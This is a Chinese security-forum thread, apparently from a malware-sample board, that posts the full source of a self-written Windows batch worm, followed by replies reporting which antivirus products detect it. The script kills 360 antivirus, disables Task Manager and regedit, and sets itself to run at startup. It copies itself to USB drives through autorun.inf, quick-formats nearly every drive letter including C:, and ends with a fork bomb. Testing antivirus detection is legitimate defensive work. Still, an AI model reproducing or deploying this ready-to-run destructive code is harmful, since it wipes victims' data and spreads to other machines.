FormatCY漏洞利用批处理脚本

显示全部楼层 · 发表于 2022-12-18 20:52:44

自制的，里面有注释

请勿在实机运行！
把里面的FormatYD.txt把后缀改成.bat就行了

显示全部楼层 · 发表于 2022-12-18 20:55:01

https://www.virustotal.com/gui/f ... 8c9caa109?nocache=1

显示全部楼层 · 发表于 2022-12-18 20:56:15

智量
双击：KILL

显示全部楼层 · 发表于 2022-12-18 20:57:29

[url=home.php?mod=space&uid=331734]@echo[/url] off
::PROCESS START——
::Creator_pythonhavenoname
::PS_其实写了很多重复代码，Because水平有限-_-'
::中途你会发现许多start cmd >NUL 2>NUL，这是为了干扰受害者的操作。
::这个就是最终的1.0版本定型啦>o<
::接下来就是所有代码啦！0_0
cls
title Virus.bat.FormatYD.a - by bilibili:python无名氏
color 40
net.exe session >NUL 2>NUL && (
goto as_admin
) || (
goto not_admin
)
:as_admin
goto malware
:not_admin
title 请以管理员身份运行
echo 这个程序需要管理员权限，现在没有！
echo 请以管理员身份运行！
echo 按任意键退出...
pause>nul
exit
:malware
::准备工作开始——
::禁用任管和regedit + 劫持360进程
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
taskkill /f /im 360tray.exe /t >NUL 2>NUL
reg add "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t reg_dword /d "1" /f >NUL 2>NUL
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableRegistryTools /t reg_dword /d 00000001 /f >NUL 2>NUL
::添加开机自启
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v %0 /d %0 /f >NUL 2>NUL
::查找U盘
for /f "tokens=2 delims==" %%a in ('wmic LogicalDisk where "DriveType='2'" get DeviceID /value') do (
set DriveU=%%a
) >NUL 2>NUL
::准备部分结束——
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
::传播部分开始——
::将自身复制到U盘，并写入autorun.inf(插入U盘自运行)
copy %0 %DriveU% >NUL 2>NUL
set sn=%~n0
echo [AutoRun]>%DriveU%\autorun.inf
echo open=%sn%.bat>>%DriveU%\autorun.inf
::弹出U盘，防止一会儿被自己给格了
mountvol %DriveU% /d >NUL 2>NUL
::将自身复制到各个盘去(其实没啥卵用，因为到最后还不是被格了)
copy %0 z: >NUL 2>NUL
copy %0 q: >NUL 2>NUL
copy %0 y: >NUL 2>NUL
copy %0 w: >NUL 2>NUL
copy %0 n: >NUL 2>NUL
copy %0 k: >NUL 2>NUL
copy %0 l: >NUL 2>NUL
copy %0 h: >NUL 2>NUL
copy %0 o: >NUL 2>NUL
copy %0 p: >NUL 2>NUL
copy %0 x: >NUL 2>NUL
copy %0 j: >NUL 2>NUL
copy %0 u: >NUL 2>NUL
copy %0 t: >NUL 2>NUL
copy %0 d: >NUL 2>NUL
copy %0 c: >NUL 2>NUL
copy %0 e: >NUL 2>NUL
::传播部分结束——
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
::破坏部分开始——
::通过format命令吃掉磁盘（因为怕吃不干净，所以加了mountvol命令弹出磁盘）
start cmd >NUL 2>NUL
echo y|format d: /q >NUL 2>NUL
mountvol d: /d >NUL 2>NUL
echo y|format e: /q >NUL 2>NUL
mountvol e: /d >NUL 2>NUL
echo y|format f: /q >NUL 2>NUL
mountvol f: /d >NUL 2>NUL
echo y|format g: /q >NUL 2>NUL
mountvol g: /d >NUL 2>NUL
echo y|format h: /q >NUL 2>NUL
mountvol h: /d >NUL 2>NUL
echo y|format i: /q >NUL 2>NUL
echo y|format g: /q >NUL 2>NUL
echo y|format k: /q >NUL 2>NUL
echo y|format l: /q >NUL 2>NUL
echo y|format m: /q >NUL 2>NUL
echo y|format n: /q >NUL 2>NUL
echo y|format o: /q >NUL 2>NUL
echo y|format p: /q >NUL 2>NUL
echo y|format q: /q >NUL 2>NUL
echo y|format r: /q >NUL 2>NUL
echo y|format s: /q >NUL 2>NUL
echo y|format t: /q >NUL 2>NUL
echo y|format u: /q >NUL 2>NUL
echo y|format v: /q >NUL 2>NUL
echo y|format w: /q >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
echo y|format x: /q >NUL 2>NUL
echo y|format y: /q >NUL 2>NUL
echo y|format z: /q >NUL 2>NUL
mountvol c: /d >NUL 2>NUL
echo y|format c: /q >NUL 2>NUL
mountvol i: /d >NUL 2>NUL
mountvol j: /d >NUL 2>NUL
mountvol k: /d >NUL 2>NUL
mountvol l: /d >NUL 2>NUL
mountvol m: /d >NUL 2>NUL
mountvol n: /d >NUL 2>NUL
mountvol o: /d >NUL 2>NUL
mountvol p: /d >NUL 2>NUL
mountvol q: /d >NUL 2>NUL
mountvol r: /d >NUL 2>NUL
mountvol s: /d >NUL 2>NUL
mountvol t: /d >NUL 2>NUL
mountvol u: /d >NUL 2>NUL
mountvol v: /d >NUL 2>NUL
mountvol w: /d >NUL 2>NUL
mountvol x: /d >NUL 2>NUL
mountvol y: /d >NUL 2>NUL
mountvol z: /d >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
start cmd >NUL 2>NUL
::破坏部分结束——
::调个皮:D 其实很可能程序撑不到这（系统盘汐了）
msg * hello! your data is FUCKED by me! >NUL2>NUL
::来颗内存炸弹:D
%0|%0|start %0 >NUL 2>NUL
::PROCESS END——

复制代码

显示全部楼层 · 发表于 2022-12-18 21:03:25

显示全部楼层 · 发表于 2022-12-18 21:07:19

卡巴没有反应，虚拟机G了，上报了

显示全部楼层 · 发表于 2022-12-18 21:13:50

bdts miss

显示全部楼层 · 发表于 2022-12-18 21:21:44

McAfee miss

显示全部楼层 · 发表于 2022-12-18 21:53:52

360

显示全部楼层 · 发表于 2022-12-18 22:03:37

本帖最后由 anthonyqian 于 2022-12-19 08:18 编辑

微软上报后快速地添加了检测Trojan:BAT/Malgent!MSR

ESET：Thank you for your submission.
The detection for this threat will be included in the next update of detection engine, expected version: 26440.

FormatYD.bat - BAT/Autorun.HX worm

[病毒样本] FormatCY漏洞利用批处理脚本

本帖子中包含更多资源

评分

本帖子中包含更多资源

本帖子中包含更多资源

本帖子中包含更多资源